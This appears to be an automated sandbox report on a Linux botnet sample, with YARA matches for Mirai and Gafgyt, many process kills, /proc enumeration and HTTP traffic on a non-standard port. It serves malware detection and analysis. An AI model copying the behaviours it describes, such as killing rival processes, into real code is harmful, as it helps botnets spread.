      Source: 5271.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5267.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5280.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5279.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 936, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5275, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 658, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 720, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 759, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 761, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 772, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 797, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1320, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1334, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1335, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1389, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1809, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1872, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 1983, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 2048, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 4331, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5025, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5218, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5219, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5271, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5279, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5280, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5309, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5321, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5322, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5323, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5325, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5326, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5337, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5340, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5399, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5401, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5402, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5403, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5404, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5407, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5465, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5466, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5469, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5491, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5495, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5496, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5501, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5502, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5523, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5527, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5538, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5561, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5592, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5595, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5598, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5599, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5600, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5601, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5602, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5603, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5604, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5605, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5606, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5607, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5608, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5609, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5610, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5611, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5612, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5613, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5269)SIGKILL sent: pid: 5614, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 936, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 491, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 658, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 720, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 721, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 759, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 761, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 772, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 774, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 777, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 785, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 793, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 797, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1320, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1334, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1335, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1344, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1389, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1476, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1601, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1809, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1860, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1872, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1886, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 1983, result: successful
      Source: /tmp/SLdtSSVlj2 (PID: 5275)SIGKILL sent: pid: 2038, result: successful
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: classification engineClassification label: mal100.spre.troj.lin@0/4@0/0

      Persistence and Installation Behavior:

      barindex
      Sample reads /proc/mounts (often used for finding a writable filesystem)Show sources
      Source: /usr/bin/dbus-daemon (PID: 5309)File: /proc/5309/mountsJump to behavior
      Source: /bin/fusermount (PID: 5324)File: /proc/5324/mountsJump to behavior
      Source: /lib/systemd/systemd-journald (PID: 5325)Reads from proc file: /proc/meminfoJump to behavior
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1582/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/2033/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/670/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/793/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/793/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1579/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1612/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/674/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1335/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/796/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/796/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/675/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1334/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1532/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1576/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/676/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/797/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/797/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/677/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/799/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/799/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/910/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/912/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/912/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/759/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/759/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/517/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/918/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/918/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1594/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1349/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/761/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/761/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/884/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/884/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1389/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1983/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/2038/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/720/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/720/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1344/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1465/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1586/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/721/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/721/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1860/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1463/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/800/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/800/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/801/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/801/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/847/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/847/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/491/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/491/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/2009/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/772/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/772/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1599/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/774/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/774/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1477/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/654/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/896/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1476/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1872/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/655/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1475/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/777/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/777/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/656/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/657/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/658/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/658/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/936/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/936/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/419/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1809/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1494/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1601/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/420/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1886/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/2018/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1489/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/785/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/785/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/2014/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1320/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/667/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/788/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/788/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/789/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/789/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/904/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/904/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1207/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5269)File opened: /proc/5382/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5269)File opened: /proc/5263/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5269)File opened: /proc/4450/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5269)File opened: /proc/4450/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5269)File opened: /proc/4450/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5269)File opened: /proc/5144/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5269)File opened: /proc/4331/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5269)File opened: /proc/4331/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5269)File opened: /proc/4331/exe
      Source: /usr/bin/whoopsie (PID: 5321)Directory: /nonexistent/.cacheJump to behavior
      Source: /usr/sbin/rsyslogd (PID: 5323)Log file created: /var/log/kern.logJump to dropped file

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Uses known network protocols on non-standard portsShow sources
      Source: unknownNetwork traffic detected: HTTP traffic on port 49312 -> 60001
      Source: unknownNetwork traffic detected: HTTP traffic on port 60001 -> 49312
      Source: /tmp/SLdtSSVlj2 (PID: 5267)Queries kernel information via 'uname':
      Source: /usr/sbin/rsyslogd (PID: 5323)Queries kernel information via 'uname':
      Source: /lib/systemd/systemd-journald (PID: 5325)Queries kernel information via 'uname':
      Source: SLdtSSVlj2, 5267.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5270.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5271.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5275.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5276.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5279.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5280.1.00000000010e50a8.00000000cdf312d3.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sparc
      Source: SLdtSSVlj2, 5267.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5270.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5271.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5275.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5276.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5279.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5280.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sparc/tmp/SLdtSSVlj2SUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/SLdtSSVlj2
      Source: SLdtSSVlj2, 5275.1.00000000010e50a8.00000000cdf312d3.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
      Source: SLdtSSVlj2, 5275.1.00000000010e50a8.00000000cdf312d3.rw-.sdmpBinary or memory string: /sparc/0 /proc/224/exemt/sparc/p!/proc/796/fd/4/sparc/p1/usr/bin/vmtoolsdparc/u-binfmt0!/proc/225/exe!/proc/796/fd/3/sparc/p1u-binfmt/sparc/Q=
      Source: SLdtSSVlj2, 5267.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5270.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5271.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5275.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5276.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5279.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5280.1.00000000010e50a8.00000000cdf312d3.rw-.sdmpBinary or memory string: FV!/etc/qemu-binfmt/sparc
      Source: syslog.27.drBinary or memory string: Jan 15 00:45:13 galassia kernel: [ 422.084114] Modules linked in: monitor(OE) md4 cmac cifs libarc4 fscache libdes vmw_vsock_vmci_transport vsock binfmt_misc dm_multipath scsi_dh_rdac scsi_dh_emc scsi_dh_alua vmw_balloon joydev input_leds serio_raw vmw_vmci sch_fq_codel drm parport_pc ppdev lp parport ip_tables x_tables autofs4 btrfs zstd_compress raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel crypto_simd cryptd glue_helper psmouse ahci mptspi vmxnet3 scsi_transport_spi mptscsih libahci mptbase
      Source: SLdtSSVlj2, 5267.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5270.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5271.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5275.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5276.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5279.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5280.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc
      Source: syslog.27.drBinary or memory string: Jan 15 00:45:13 galassia kernel: [ 422.084164] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 12/12/2018

      Stealing of Sensitive Information:

      barindex
      Yara detected MiraiShow sources
      Source: Yara matchFile source: SLdtSSVlj2, type: SAMPLE
      Source: Yara matchFile source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Yara detected GafgytShow sources
      Source: Yara matchFile source: SLdtSSVlj2, type: SAMPLE
